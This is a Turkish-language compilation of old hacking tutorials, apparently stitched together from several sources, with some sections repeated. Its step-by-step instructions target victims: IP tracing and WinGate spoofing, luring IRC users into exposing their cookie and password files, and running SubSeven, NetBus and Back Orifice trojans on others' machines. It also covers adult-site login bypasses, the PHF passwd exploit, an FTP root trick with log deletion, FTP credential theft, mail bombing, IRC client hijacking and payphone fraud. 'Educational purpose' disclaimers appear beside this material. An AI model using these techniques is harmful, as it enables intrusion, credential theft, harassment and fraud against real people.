GENEL HACK BİLGİLERİ

Şimdi bu çok basit işlemler silsilesini kademe kademe anlatacam, bu metod icq98 de tarafımdan test
edilmiştir , ve %80 olumlu sonuç vermiştir , fakat bu bug linux versionlarında yok, temel olarak işletim
sistemiyle ilintili oluşmuş bir bug.

1- ICQ da away pozisyona geçin....bekleyin
2- Ms-Dos promptunu açıp Netstat yazıp bekleyin
3- Daha hiç bi şeyi enter lamayın!
4- IP sini örenmek istediiniz adama "away" durumdayken(sen) msg atın.
5- Cevap size ulaştığında bekleyin mektup yanıp sönsün açmayın!
6- O zarf orda yanıp sönedursun siz Ms-Dos a dönüp daha evvelden yazıp hazır beklediğiniz Netstat
komutunu enterlayın...
7- Aha size IP.

Wingate ile IP spoofing.

Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini
kullanmasini saglamak icin kullanilir.Ornek:internet cafeler.
Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da
yani wingate yuklu ve calismakta olan makinada 23. port a telnet cektiginizde su cevabi alirsiniz.

WinGate>

bu komut satirinda komutlar vererek baska yerlere baglanmak mumkundur.Tabi burdan baglandigimiz
makinalarda bizim degil baglandigimiz wingate server in ip sini goreceklerdir.

Asama -1- Bir wingate server i bulma:

Bunun icin en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve boylece
kendi serverlarimizi bulmaktir.Piyasada disariya acik oldugu bilinen yuzlerce server vardir
ama bunlari kullanmanizi tavsiye etmem cunku herkes onlara yuklendigi icin bunlardan
spoofladiginizda lag a girersininiz.Tavsiyem GateScan programi.Bu program verilen ip araliklarinda
secilmis bir port un acik olup olmadigini ; eger aciksa belli bir cevabi(recieve string) verip vermedigini kontrol eder.
Normal durumda,siz degisdirmediginiz surece(halimize bak bi default lafi kullanmicaz diye
kendimizi paraliyoz) port 23 ve receive string WinGate> dir yani wingate serverlarini tespit etmeye
hazirdir.En ustteki kutuya bir ip yazdiginizda ornegin 194.54.48.63 olsun 194.54.48.0 dan baslayarak 194.54.48.255 e kadar
hepsinin 23 . portuna baglanacak WinGate> cevabini verip vermediklerini kontrol edecektir.Tavsiyem irc ye girin
millete dns cekin gelen ip leri buraya yazin.En guzel serverlar Boyle Gecici ip lerden cikar.
Ama 2 saat sonra nolucagini bilemezsiniz.emin olmak isterseniz sitedeki wingate listesindeki server lari
kullanin.

Simdi wingate ip lerimiz hazir dielim. Mesela ip miz 195.33.226.5 olsun.Spooflayacagimiz server da irc.emu.edu.tr olsun

mIRC yi acin

/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a baglaniyoruz.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te edebilirsiniz.

bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.WinGate> demesini bekleyin......

WinGate> deyince

/quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz.

Yine bisuru sey sayikliyacaktir onlari da iplemeyin ....
Muhim olan "irc.emu.edu.tr Connected" demesi.Bunu gorunce

/quote user xxxxx xxxxx mail@adresiniz.com xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim degildir.Bunlar millet size whois cektiginde gorunecek yazilardir.Istediginizi yazabilirsiniz muhim olan kelime sayisinin ayni olmasi.

/quote nick isminiz

Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Eger olmassa baska serverlar deneyin.Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz.

Irc de burgaz kanalına giriyorum orada gözüme kestirdigim birinin özeline girip nuke programın varmı diye soruyorum
var derse benim dcc direk calışmıyo /fserve ROadBoY 100 c: oda yazıyo ondan sora netscape in içinde user in içindeki
cookies dosyasıynı alıyorum ve elimde tüm mail leri mail passwd leri oluyo (tabi bazen olmuyo :P) nuke programın var
mı dediğimde yok derse istermisin diyorum o daha kolay oluyo hemen atlıyo aynı yöntemle... onlada fserve kuruyorum
böylece onunda cookies dosyasını alıyorum ve boooooom gene elimde tüm mailleri ve webde üye olduğu yerlerin
passwd ler (tabi her zaman işe yaramıyo bunuda hatırlatıyım :P)

BU YAZI BİLGİ EDİNMENİZ İÇİN YAYINLANMIŞTIR.UYGULANMASI SUÇ TEŞKİL EDEBİLİR.

TELEFONLARI BEDAVA KULLANMAK!Evet sevgili arkadaslar. Sonunda telefon kartim bitti diye uzulmiyeceksiniz. Elinizde bulunan tek konturluk kartla bile sabaha kadar konusmak mumkun :)

Bunu yapmak icin neler gerekli:

1) Kartli bir telefon (ahize kolu kalkanlardan)
2) Bir bozuk (arkasindaki siyah data seridine oje surunce kart hemen bozuluyor) birde normal bir telefon karti.

Bele$ konusma:

Kart bittikten ve telefon karti yuttuktan sonra telefonu kapatmadan 0800 yazin. Bu numarayi yazinca ekranda ucretsiz arama yazicak.
Daha sonra muteakip aramaya basip hemen arkasinda 15-20 kez tekrar arama tusuna basin.
15-20 kez tekrar aramaya bastiktan sonra ekran dolana kadar 2 tusuna basin (yine yaklasik 15-20 defa ediyor).
Bu islemden sonra ekranda ucretsiz arama yazip kaybolacak.
Daha sonra aramak istedigniz numarayi cevirin. Numara ekranda gorunmeyecek.
Aradiginiz numara calinca gecersi karti sokun. Karti reddedecek ama konusma saglanacak. :)

Bu bilgi baska bir siteden alinmistir dogrulugu bilinmemektedir.

SubSeven'ı uzaktan yonetim icin veya hackıng programı olarak kullanabilirsiniz. Zip dosyasının icinde iki tane program var bi tanesi server.exe bunu kurbanın bilgisayarında calıstırmalısınız netbustan filan girip upload edebilirisiniz. Sebseven.exe ise esas program her seyi bu program sayesinde yapacaksınız...

Kullanımı basit bi trojan. Kurban bilgisayarda server.exeyi calıstırıyorsunuz, gostermelik bi hata mesajı belirecek [soyle: error loading system resources]. bundan sonra program kendini otomatik hardiske kuracak, ve windows her acıldıgında oda acılacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi bundan yapacaksınız.

+ Kurban'la chat yapabilirsiniz. İcq chat gibi bir programı var her zaman ustte olucak yani hic bi zaman kucultemez. Chatlesirken bi kac numara yapabilirsiniz. .Kurbanın yazdıgı yer kaybolur sadece sizin yazdıklarınızı gorur kendisi yazamaz. Chat'ide kapatamaz ancak bilgisayarı kapamak zorunda kalır..

+ Mouse trail'ı ekleyebilirsiniz.[Hani su mouse'un arkasından gelen bi ok daha varya o iste]

+ Kullanıcının bilgisayarı hakkında daha detaylı bilgi alabilirsiniz.Windows version,

+ Ses kaydeder. Kac saniyelik ses kaydı istiyorsanız yazıyorsunuz. Ve kayıt bittiginde

+ Dosya Yoneticisi.Kurbanın bilgisyarındaki butun dosyaları gorebilirsiniz. Bi klasore iki

- İstediginiz programı/trojanı kullanıcının bilgisayarında calıstırabilirsiniz.

+ Mouse tuslarının yerlerini degistirir..Sola bastıgında sag sag bastıgında sol tusun

+ Kurban online olunca haber verir. Bunu E-mail serverı kullanarak yapabilirsiniz, icqdan

+ Server'ı kapar.Fakat kullanıcı bilgisayarı bi daha actıgında server yeniden acılır..

Pek çok adult web sitesi var günümüzde.. Büyük bir çoðunluðu da iyi korunmuyor. Backdoor adı verilen arka kapılar, basit şifreler, kredi kartı kırma gibi yöntemlerle bu sistemlerin üyeler bölümlerine para vermeden girmek olası.

1: Eðer ana bilgisayardan password giriþi Java aracýlýðýyla yapýlýyorsa (ZýpZýp'ýn utopia one üyeler giriþindeki gibi (www.turk.net/utopia_one)) bu tür sitelere girmek çok zor hatta imkansýz. O yüzden bu tür sitelere girmeye çalýþmayýn.

2: Yetersiz þifreler: Bu problem (ya da arka kapý) pek çok internet sitesinde ve e-posta þifresinde görülür. Kullanýcý adý ve þifresi ayný olabilir. Bir kiþinin username'ini bulduysanýz þifre olarak aynýsýný ya da tersten yazýlmýþýný, baþýna ya da sonuna 1 koyarak, ilk harfi büyük yazarak girmeyi deneyebilirsiniz. Ayný zamanda web sitelerinde sýk sýk kullanýlan basit kullanýcý adý ve þifreler þunlar:

Bazen de site ismi kullanýcý adý ve þifre olarak kullanýlabilmekte. Örneðin:

domain: hotbabes.com, kullanýcý adý: hot, þifre: babes gibi, ya da kullanýcý adý: hotbabes, þifre: hotbabes gibi.

3: <ENTER> ÞÝFRESÝ: Pek çok þifre oluþturma programý kullanýcýn þifre girip girmediðini kotrol etmez. (Özellikle adult sitelerde). Kullanýcý adýný john, 123456, hotmail vs. vs. girip þifre alanýný boþ býrakarak pek çok adult siteye girebilirsiniz. Adult sitelere giriþ için kullanýlan en popüler yöntemlerden biri de budur.

4: ÞÝFRE DOSYASI: Giriþ için en zor yöntemlerden biri. Bir önceki sayýda anlatýlan þifre dosyasýný bulup CrackerJack vs. türü bir programla þifreyi kýrýp kullanmak. Eðer bunu yapabiliyorsanýz nasýl olsa siteye bir arka kapý koyarsýnýz. Bu yazýyý okumanýza gerek yok :))

5: SÝSTEM YÖNETÝCÝSÝ BÖLÜMÜ: Pek çok web sitesinde bir web sistem yöneticisi kullanýcý ekler/siler. Ayný zamanda pekçok sistem yöneticisi bölümü korunmaz. Pekçok web sayfasýnda sistem yöneticisi giriþi site adresi/admin.html'dir:

Eðer bu tür bir giriþ yakalayabilirseniz sýnýrsýz kullanýcý açabilirsiniz ya da istediðiniz kullanýcýyý silebilirsiniz. (Sistem yöneticisi de dahil).

6: ÜYELER DÝZÝNÝ: Pekçok web sitesinde üyeler dizinine þifreyle giriþ yapýlabilirken ayný dizine direk adres verilerek de giriþ yapýlabilmektedir. Örneðin /members dizinine

7: ÞÝFRE EKLEYÝCÝ PROGRAMI: Bir adult siteye para verip üye olmak istediðinizde önce sizin kullanmak istediðiniz kullanýcý adýnýn olup olmadýðý kontrol edilir. Eðer yoksa kullanýcý adý sisteme eklenir. Baþarýyla kullanýcý eklendi gibi bir mesaj aldýktan sonra bu sayfayý kaydedin. Aradan biraz zaman geçtikten sonra (þifreniz artýk çalýþmýyorsa) tekrar ayný sayfaya girip yeniden kullanýcý açabilirsiniz!. (Tabii para ödemeden) Güvenliði çok iyi olan pek çok sitede bile bu yöntem çoðu zaman geçerlidir. Kaydettiðiniz sayfanýz kodlarýna baktýðýnýzda bir PIN numarasý ya da güvenlik numarasý göreceksiniz. (<input type="hidden" name="PIN" value="4788236">) gibi. Value alanýný deðiþtirerek sisteme yeniden farklý bir kullanýcý açmanýz da olasý.

BIR SITENIN PASSWORDUNU ELE GECIRDIKTEN SONRA SITEDE ARKA KAPI (YANI SIFRESIZ BIR YER) VAR MI DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE YAPIN TABI SITEDEKI RESIMLERI BULMAYA AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI TELEPORT PRO VASITASIYLA CEKTIKTEN SONRA ELINIZLE KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI GENELDE SIFRELIDIR FIFRELI OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK VERILMISSE MESELA SIZ WWW.XXX.COM/MEMBERS TASINIZ ONLAR WWW.YYY.COM GIBI BIR YERE LINK VERMISLER ISE ORANIN BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA BUNLAR REFERER KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM

ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE OLAN DOSYALARI BULMAKTIR BUNLAR COK BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI SITELERINDEKI BEDAVA GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI

BAZEN DE REFERER KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O ADRESTEN TIKLARSANIZ GIRERSINIZ BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN DUNYANIN SEX SITELERI AYAGINIZIN DIBINDE BAKIN MESELA SU ADRES BIR ORNEK OLSUN

BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE GIDIN SIZE MUTLAKA INTERNAL SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI KANDIRIYO ADAM GITMENIZ GEREKEN ADRES ASLINDA SU ISE TUM FAZLALIKLARI ATALIM BU ADRESE GIREMEDINIZ SIMDI AYNI SAYFADA FAZLALILLARI ATALIM VE SOYLE YAZALIM

BAZI ADRESLER DE SIZIN NEREDEN GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR SAYFAYA GONDERMEYE KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN ONCE HEMEN STOP A BASIN KI O SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE BAKARAK SIZI YA PARA ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE BIZ STOP A BASIP BIZI GONDERECEGI GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA

HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE TABI IKI UC KERE O SAYFADA KALIN EEE SIMDI NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM

Internetteki gördugunuz serverlar genelde Unix,Linux ve ya Windows NT'dir.Bunlar en populer olanlari.Tum webmasterlar ve adminler kullanimi cok kolay ama o kadar da guvenli bir siteye sahip olmak icin caba harcarlar.Ama sonucta mukemmel guvenli bir server ve site imkansizdir.Mutlaka delikler (holes) bulunur.Bunun ispati cok kolaydir.Gecmiste NASA,FBI,CIA..
gibi son derece guvenli olmasi gereken siteler hack edilebilmistir.

Genel ve ileri duzey hack:
Burada anlatilanlarin bazilari hack ama cogu hack degildir.Yani bunlari yaparak hacker olunur demek moronluk olur :).

Kolay Bulunan Sifreler:
Genelede belli kesim kullanicilar ve ozellikle caylak olanlar akilda kalmasi icin basit sifreler kullanirlar.Hatta bazi webmasterlar ve adminler bile bu yolla sifre secebiliyorlar.Bunlara genelde kekmaster deniyor.
Bu login ve passwordlere birkac ornek:

Login: asdf Password: asdf
Login: 123456 Password: 123456
Login: amateurs (sitenin ismi ex: amateurs.com) Password: amateurs
Login: bob (hesap sahibinin ismi) Password: bob
Login: letmein Password: letmein
Login: qwerty Password: qwerty
Login: login Password: password
Login: 1111 Password: 1111

Anladiginiz gibi bu tur hizlica yazilabilecek kelime ve sayilar.Bu arada bir tiyo.En saglam sifreler kelimelerle sayilarin birlesiminden olusur.

Arka kapilar :
Sitelerin arka kapilari genelde korumasi olmayan dizinlerdir(folder).Bir ornek:

Hard Disk----->Web Server Dizini----->ResimlerDizini----->Korumali Dizin(.ht dosyalarinin oldugu dizin !)--->Members Bolumu.

Sizce buradaki arkakapi hangisi ? Resimler dizini.Resimler dizini sifre korumali degil cunku korumali dizinin icinde degil.Bu bosluktan yararlanarak resimler dizini arkakapi olarak kullanilir ve iceri dalinilir....:)

Kredi Karti :
Bu oldukca basit bir yontem olmakla beraber bezdiriciligi de hat safhada olabilir.Bunun icin bir kredikart numarasi yreten program bir de fake ip lazim.Kr.kart numarasi uretmek kolay tutturmak zordur.Bulursanizda yasal olarak ancak harddiskinizde borsacilik oynamaniz lazim.
hehe...Fake ip almaninsa bikac yolu var.Ya www.anonymizer.com veya iproxy.com sitelerinden ve ya proxy server uzerinden login olarak.Ve ya "fake ip now" adindaki programi kullanabilirsiniz.
Sonra istediginiz siteye uye olabilirsin parasini sayarak.

.htaccess & .htpasswd Dosyalari:
Bu dosyalar korumali dizin icerisindedir.Ve ya /members , /admin ve /secure dizinleri altinda bulunabilir. .htaccess dosyasi uyeler hakkinda yararli bilgiler icerir ve de daha fazla bilgiyi nerede bulacaginizi belirtir.Örnek : /etc dizini .Ayrica .htaccess dosyasinda .htpasswd dosyasinin nerde oldugu da belirtilir.Baska bir dizinde hatta serverda olabilir. .htpasswd dosyasi sifre bilgilerini icerir , jack ve john adindaki kardeslerle daha yakin bir dostluk kurdurulailir. ;)

Admin dizi ve sayfalari:
Admin dizinler genelde bircok bilgi tasirlar .Adminler bunlari disardan erisebilmek icin kullanirlar.Adlari admin.html , admin.htm ve ya admin.shtml olabilir ama baska herhangi bir isme sahipte olabilirler.Ama bulunduklari zaman adminlerin islerine son verilebilecek bir kaynaga erisilmis olunur.

Evet .Bunlar genelde olayin en basit ve genel bir aciklamasi.Daha bircok teknik ve ornek olabilir ama bu kadarinin anlasilmasi bile bircok kapiyi acacaktir.

Haaa bu arada burdaki bilgilerin hepsi egitim amaclidir.Boylece adminler daha guvenli bir server ve site gelistirebilecekler.Kuslar daha guzel ucacak ve hayat annamini bulacak.

Aidata'da IP lerinin gözükmemesini güvence alarak küfür eden insanlar var. Bu tip insanların IP sini bulmanız için yapmanız gereken şeyler;

Öncelikle sizin nick 'iniz Register edilmiş olacak. ( kendiniz register edebilirsiniz )
Ardından rastgele bir kanala girin ( register edilmemiş olacak! Örnek; #jdfshgb ). Ve odayı register edin ( /msg chanserv register #kanal_adi sifre aciklama ). Sonra register'dan sonra identify edin kendinizi ( /msg chanserv identify #kanal_adi sifre ). Sonra Ip sini almak istediğiniz kişinin nick 'ini şöyle yazıyorsun; ( IP sini bilmek istediğiniz nick registerlı olacak ) "/msg chanserv set #odaadı founder nick" .

Daha sonra Founder Changed gibi yazilar gelecek. O zaman işimiz halloldu demektir. Ve son bir komutla Ip karşımıza geliyor!
"/msg chanserv info #odaadı"

WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)

PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:

Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.

Konu:Web site hacklemek!

ANLATIM

1-"Computer name or IP:" sitenin bulunduğu ftp adres yazılır (ex:ftp.xoom.com)

3-"Dictionary file:" bolumunu wordlistin adı yazılır(unsecure'la aynı dizinde olmalı!)

4-2. bolumdeki yazıların anlamları şunlardır;
Dictionary attack: wordlist kullanılarak yapılan saldırı!
Brute for attack: 3. bolumden seçtiğinize gore butun harfleri, rakamları, işaretleri vs. vs.. deniyerek yapılan saldırı! (Bunu seçmenizi tavsiye atmem işiniz acaip uzar!)
Reconnect on Disconnect: Koptuğunda tekrar bağlanma (kesin işaretleyin)
AutoSave every 100 Attempts: her yuz kelime deneyişinde save etme (size kalmısh eğer wordlistiniz buyukse işaretleyin, küçükse değmez!)
Shopar Online'den alinmistir.

Server Hack..

Internete baglandıktan sonra hemen dos komut istemine'e cıkın...
Kurban yerine hackliyceginiz server'ı yazın adamın serverını filan bulmak icin internic.com a gidin search yapın sayfanın en altında
yazar..

ftp kurban.com
server username sorcak entera basıp gecin
server password sorcak entera basıp bunuda gecin
ve sunu yazın
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp

Sonra mutlaka log file ını silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptıysanız ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..

Not: Bu yontem yeni serverlarda calısmıyor. Universitelerde filan calısıyor..

Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu gibi konularda en önemli olay
mantıktır.. Bu hack olayı için karşı tarafın BOSERVE yada PATCH gibi yem programcıklarını
çalıştırması gerekir.. Bunu yaptığını farzedelim! Her FTP programının şifreleri kaydettiği bir DATA
dosyası vardır. Genelde ençok kullanılan CUTEFTP dir. Bu ftp programı kaydedilen şifreleri,
SMDATA.DAT dosyasında saklıyor.. Karşıdaki kurbanın SMDATA.DAT dosyasını alınız.. Bunuda şu yolu
takip ederek bulabilirsiniz.. Genelde : /PROGRA~1/CUTEFTP/SMDATA.DAT dır. Bu dosyayı kendi
cuteftp nizin olduğu yere kopyalayın.. fakat bundan önce kendinizinkini yedekleyinki sizin şifreler
silinmesin.. Daha sonra bu dosyadan şifreleri alın.. Olay bu kadar basit.. Her ftp programında bööle bi
bug bulunur.. Size önerim şifrelerinizi hiçbi dosyaya yada programa kaydetmeyin.. Tembellik kötü
şeydir.. :)

1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli program ile bunu yapmak çok kolay ustdeki bolume
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz
sonra assagi tarafa yeni sifreyi yazip giriyoruz.

2.)Yöntem Telnetle:

Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.

Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreyedephiberoptik yaziyoruz

Netbus kullanmaktan daha kolay bişey olmadığını herkes biliyor. Gerçekten de
Mouse kullananabilen herkes bu Programı kullanabilir. Fakat asıl önemli olan,
NetBus'ı Profesyönelce kullanmak... Mesela birinin şifresini ele geçirmek istiyorsanız
ilk olarak kurbanın windows dizininde bulunan *.pwl doasyasını ele geçirmelisiniz.
bunu herkes bilir, fakat ben size bu Accountları daha kolay ve kısa sürede ele
geçirmek için bulduğum başka yöntemlerden bahsediyim:

Eğer kurban SuperOnline'dan bağlıysa c:\windows\system.dat dosyasını
download edip wordpadde açınız. Bu dosya kurbanın Registry kayıtlarını
içermektedir ve Superonline Guide'daki bir güvenlik sorunu sayesinde
Accountunu ele geçiricez. Wordpadde Find Penceresine SoundConnect yazıp
dosya içinde aratınız. Hemen sağında yada alt satırda kurbanın username ve
şifresinin yazdığını göreceksiniz.

SuperOnline dışındaki şifreleri ele geçirmek için Back Orifice adli programi kurbana
upload edip çalıştırın. bu spy programı tek tıklamayla kurbanın net şifrelerini size
verecektir. Aynı zamanda, kurbanınız NetBus'ı Farkedip sisteminden kaldırırsa Back
Orifice ile aynı şekilde Netbusı upload edip çalıştırabilirsiniz.

Mail Bomb

Mail bomb bildiginiz gibi bir email adresine 100 lerce hatta binlerce mail atilmasiyla atilan kisinin delirmesine neden oluo :o) ehehe genelde mail bomb yapmak icin kullandiginiz programlar ya bilmem ne dll sini sorar yada tikladinmi error verir dogru duzgun calisan program bulmak biraz zor size burda mail bomb icin en guzel programlardan birinin acikliycam bu program sayesinde hem mail bomb yapabilir hemde bir arkadasiniza isimsiz bir mail de atabilirsiniz ehieh ama diyorsunuzz ki bunu simdi bu sayfayi ogrenen herkez ogrendi ehe ben sizi hiccc boyle kotu bi durumda birakirmiyim :) nuke ve trojanda da oldugu gibi bundanda kurtulmanin bir yolu var mail adresinizi unutmak :)))) saka diom tabi ole ters ters bakma :P~ ufak bi program sayesinde mail adresinize gelen fazlalik maillerde kurtulabilirsiniz.. Simdi sira geldi bu 2 programin aciklamasina...

1- Bu mail bomb programi hem oldukca basit hemde isinizi gorebilicek kadar iyi bir program target kismina mail bomb yapacaginiz kisinin email adresini yaziorsunuz sender e mail bomb yaptigininiz kisinin gormesini istediginiz adresi yaziorsunuz subject e aciklama yaziyorsunuz server a mail server adresini yaziyorsunuz copies e de kac tane mail atmak istediginizi yaziyorsunuz asagidaki bolume herhangi bir konu yazabilirsiniz ama bu sadece mail in daha uzun zamanda gitmesini sagliycakdir tavsiye etmem ve mail e tikladiginizda bomb a basliycakdir :)))

2- Uf diyorsunuzz be kardesim ne halt yemeye ogretiyon bunlari al iste 3000 tane mail geldi ne yapcaz gelde ogrettigin gibi sil.. ehehe ogretiyoruz ama silmesinide ogretiyoruz :P~ efet bu program pek etrafda aramak bulabiliceginiz bir program degil benden size bi kiyak olsun bakalim :) retrieve ye kac tane mail i silmek istediginizi yaziyorsunuz server a mail server adresini yaziyorsunuz user name ye mail adresinizin kullanici ismini yaziyorsunuz password a da sifrenizi yaziyorsunuz ve connect dedinizmi silmeye basliyor mail bomb la attiginiz maillerden cok daha hizli gelen mailleri bi programla silebilirsiniz hadi gecmis olsun.. :o)

Mafia Script v5.0

Bu IRC Scriptini çoğunuz duydunuz herhalde.Mafia 5.0 kullanan birinin bilgisayarını kontrol edebilirsiniz.Birisinin hangi scripti kullandığını öğrenmek için mircda "
/version nickname " yazabilirsiniz.Bu aşağıdaki komutu mircda " status " bölümüne yazın.

/ctcpreply nickname ping $msg(#kanalismi,yazacağınız yazı)

Burada " nickname " bölümüne Mafia kullanın nicknameini " kanalismi " bölümüne Mafia kullananın o anda bulundu kanal. Sizin de o kanalda bulunmanız şart."
yazacağınız yazı " bölümüne de Mafia kullananın adına konuşacağınız yazıyı yazın ve * YAZDIĞINIZ HER KELİMENİN ARASINA " , " KOYUN * Bu yukarıdaki
komutta " msg " yerine " join " yazarsanız o kişiyi istediğiniz kanala sokarsınız.Veya " quit " yazarsanız o kişiyi Mircda disconnect edersiniz

Internete baglandıktan sonra hemen dos komut istemine'e cıkın...

Kurban yerine hackliyceginiz server'ı yazın adamın serverını filan bulmak icin
internic.com a gidin search yapın sayfanın en altında yazar.. ftp kurban.com
server username sorcak entera basıp gecin server password sorcak entera basıp
bunuda gecin ve sunu yazın quote user ftp sonra bunu quote cwd ~root son
olarakta bunu quote pass ftp Sonra mutlaka log file ını silin cunku sizin girdiginizi
anlayabilirler.. Password dosyasi su dizinin icinde " /etc/passwd " Eger
yukardakileri yaptıysanız ve server biraz eskiyse root passwordunu alabilirsiniz,
bilmeyenler icin soleyelim root password en yuksek seviyedeki passdir onunla
herseyi yapabilirsiniz.. Not: Bu yontem yeni serverlarda calısmıyor. Universitelerde
filan calısıyor..

BEDAVA KARTLI TELEFON
Evet sevgili arkadaslar. Sonunda telefon kartim bitti diye uzulmiyeceksiniz. Elinizde bulunan tek
konturluk kartla bile sabaha kadar konusmak mumkun :)

Bunu yapmak icin neler gerekli:

1) Kartli bir telefon (ahize kolu kalkanlardan)
2) Bir bozuk (arkasindaki siyah data seridine oje surunce kart hemen bozuluyor) birde normal bir
telefon karti.

Bele$ konusma:

Kart bittikten ve telefon karti yuttuktan sonra telefonu kapatmadan 0800 yazin. Bu numarayi
yazinca ekranda ucretsiz arama yazicak.
Daha sonra muteakip aramaya basip hemen arkasinda 15-20 kez tekrar arama tusuna basin.
15-20 kez tekrar aramaya bastiktan sonra ekran dolana kadar 2 tusuna basin (yine yaklasik
15-20 defa ediyor).
Bu islemden sonra ekranda ucretsiz arama yazip kaybolacak.
Daha sonra aramak istedigniz numarayi cevirin. Numara ekranda gorunmeyecek.
Aradiginiz numara calinca gecersi karti sokun. Karti reddedecek ama konusma saglanacak. :)

Nette gördüğünüz bir insanın hangi ISP'den bağlandığını anlama üzerine. IRC'de vs. IP'leri iki şekilde görürüz:

1- 144.122.2.104 -> Direkt IP'yi görebiliyoruz.
2- 166.new-york-11-12rs.ny.dial-access.att.net -> Superonline, DorukNet vs. vs. bircok ISP'de de görüyoruz bu tür
IP'leri.. Eğer ikinci şekilde ise elemanın IP'sini aldığımız gibi MSDOS komut istemine geçiyoruz ve:

C:\WINDOWS>ping 166.new-york-11-12rs.ny.dial-access.att.net
Pinging 166.new-york-11-12rs.ny.dial-access.att.net [12.78.196.166] with 32 bytes of data:
Reply from 12.78.196.166: bytes=32 time=1276ms TTL=21
Reply from 12.78.196.166: bytes=32 time=1085ms TTL=21
Reply from 12.78.196.166: bytes=32 time=919ms TTL=21

Ping sonuçlarını görüyoruz, burada 12.78.196.166 vatandaşımızın IP'si.
Şimdi gelelim asıl bölüme, IP'sini bulduğumuz vatandaşın hangi ISP'den bağlandığını ya da hangi kurumdan
olduğunu öğrenmek için, http://www.ripe.net/db/whois.html sitesine gidiyoruz, burdan Search'e tıklayıp adamın IP
adresini yazıyoruz, işte karşımızda vatandaşın hangi kurumdan nete bağlı olduğu duruyor :)

Size biraz serverlarla nasi dalga gecilir onu annatcam valla eger cildirtmak istediiniz bi systemadministor veya operator varsa hemen asagida yazan seyleri uygulayin....

Olaya gavurlar PORT SURF diyolar...nedir yaw bu port surf?? Annatiim:simdi internete bagli her tip makinanin iletisim (data transferi) yapabilmesi icin cesitli portlar kullandigini biliyorsunuz(en azindan ogrendiniz)bu portlar internete acilan gediklerdir aslinda.

Tamam bu kadar bilgi yeter sanirim cunku saymakla bitmez neyse ne diyoduk hah port surf iste size nasil yapilir onu anlatacam.

Gibi bi tablo karsimza cikicak. Tablo serverlar zincirini bize gosteriyo bakin 13.Server varya iste o serveri tanimlayamadi nedeni muhtemelen firewall

